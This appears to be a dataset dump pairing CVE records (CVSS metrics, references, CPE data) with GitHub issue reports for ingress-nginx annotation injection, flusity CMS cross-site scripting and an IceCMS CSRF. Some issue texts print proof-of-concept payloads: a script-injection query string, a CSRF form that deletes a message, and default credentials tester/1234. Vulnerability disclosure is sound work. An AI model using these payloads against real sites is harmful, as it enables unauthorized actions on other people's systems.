A security issue was identified in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where the nginx.ingress.kubernetes.io/configuration-snippet annotation on an Ingress object (in the `networking.k8s.io` or `extensions` API group) can be used to inject arbitrary commands, and obtain the... | CVE-2023-5043: Ingress nginx annotation injection causes arbitrary command execution | https://api.github.com/repos/kubernetes/ingress-nginx/issues/10571/comments | 25 | 2023-10-25T15:48:20Z | 2023-11-16T13:41:13Z | https://github.com/kubernetes/ingress-nginx/issues/10571 | 1,961,738,338 | 10,571 |
CVE-2023-5044 | 2023-10-25T20:15:18.187 | Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/10/25/3"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B1FAA6D4-954E-4E5F-AB9A-61E1A3F9CD9B",
"versionEndExcluding": "1.9.0",
"versionEndIncluding": null,
"versionSta... | https://github.com/kubernetes/ingress-nginx/issues/10572 | [
"Issue Tracking",
"Mitigation",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | ### Issue Details
A security issue was identified in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where the nginx.ingress.kubernetes.io/permanent-redirect annotation on an Ingress object (in the `networking.k8s.io` or `extensions` API group) can be used to inject arbitrary commands, and obtain the cred... | CVE-2023-5044: Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation | https://api.github.com/repos/kubernetes/ingress-nginx/issues/10572/comments | 13 | 2023-10-25T15:48:28Z | 2024-01-03T12:53:47Z | https://github.com/kubernetes/ingress-nginx/issues/10572 | 1,961,738,590 | 10,572 |
CVE-2023-5793 | 2023-10-26T18:15:08.817 | A vulnerability was found in flusity CMS and classified as problematic. This issue affects the function loadCustomBlocCreateForm of the file /core/tools/customblock.php of the component Dashboard. The manipulation of the argument customblock_place leads to cross site scripting. The attack may be initiated remotely. The... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/flusity/flusity-CMS/commit/81252bc764e1de2422e79e36194bba1289e7a0a5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/flusity/flusity-... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fluisity:fluisity:*:*:*:*:*:*:*:*",
"matchCriteriaId": "93C33CF6-8C36-4B0D-B551-B9CAB1C59219",
"versionEndExcluding": "2023-10-24",
"versionEndIncluding": null,
"versionStart... | https://github.com/flusity/flusity-CMS/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"flusity",
"flusity-CMS"
] | After installation, log in to the backend using the default account password tester/1234

Select block
 exists for the place parameter | https://api.github.com/repos/flusity/flusity-CMS/issues/1/comments | 2 | 2023-10-23T07:43:56Z | 2024-04-19T02:35:15Z | https://github.com/flusity/flusity-CMS/issues/1 | 1,956,552,703 | 1 |
CVE-2023-42188 | 2023-10-27T00:15:09.287 | IceCMS v2.0.1 is vulnerable to Cross Site Request Forgery (CSRF). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Thecosy/IceCMS/issues/17"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://topdayplus.github.io/2023/10/2... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:macwk:icecms:2.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C8043F07-E915-49DC-A4D8-DC34AC2B9770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/Thecosy/IceCMS/issues/17 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"Thecosy",
"IceCMS"
] | After the administrator open the following page, and click the the Submit request, square message with ID 264 will be deleted.
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.146.129:8181/square/DelectSquareById/264">
<input type="submit" value="Submit ... | There is a CSRF vulnerability that can delete the message | https://api.github.com/repos/Thecosy/IceCMS/issues/17/comments | 0 | 2023-08-30T14:50:03Z | 2023-08-30T14:50:03Z | https://github.com/Thecosy/IceCMS/issues/17 | 1,873,843,313 | 17 |
CVE-2023-5810 | 2023-10-27T01:15:32.317 | A vulnerability, which was classified as problematic, has been found in flusity CMS. This issue affects the function loadPostAddForm of the file core/tools/posts.php. The manipulation of the argument edit_post_id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/flusity/flusity-CMS/commit/6943991c62ed87c7a57989a0cb7077316127def8"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flusity:flusity:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9989CEDF-D8FF-40B5-8E62-E4ABECFDBADC",
"versionEndExcluding": "2023-10-24",
"versionEndIncluding": null,
"versionStartEx... | https://github.com/flusity/flusity-CMS/issues/2 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"flusity",
"flusity-CMS"
] | After installation, log in to the backend using the default account password tester/1234
select posts

enter payload
`?edit_post_id=3);</script><script>alert(1024)</script>`
 exists for the place parameter | https://api.github.com/repos/flusity/flusity-CMS/issues/2/comments | 4 | 2023-10-24T10:36:35Z | 2023-10-24T17:50:22Z | https://github.com/flusity/flusity-CMS/issues/2 | 1,958,967,105 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.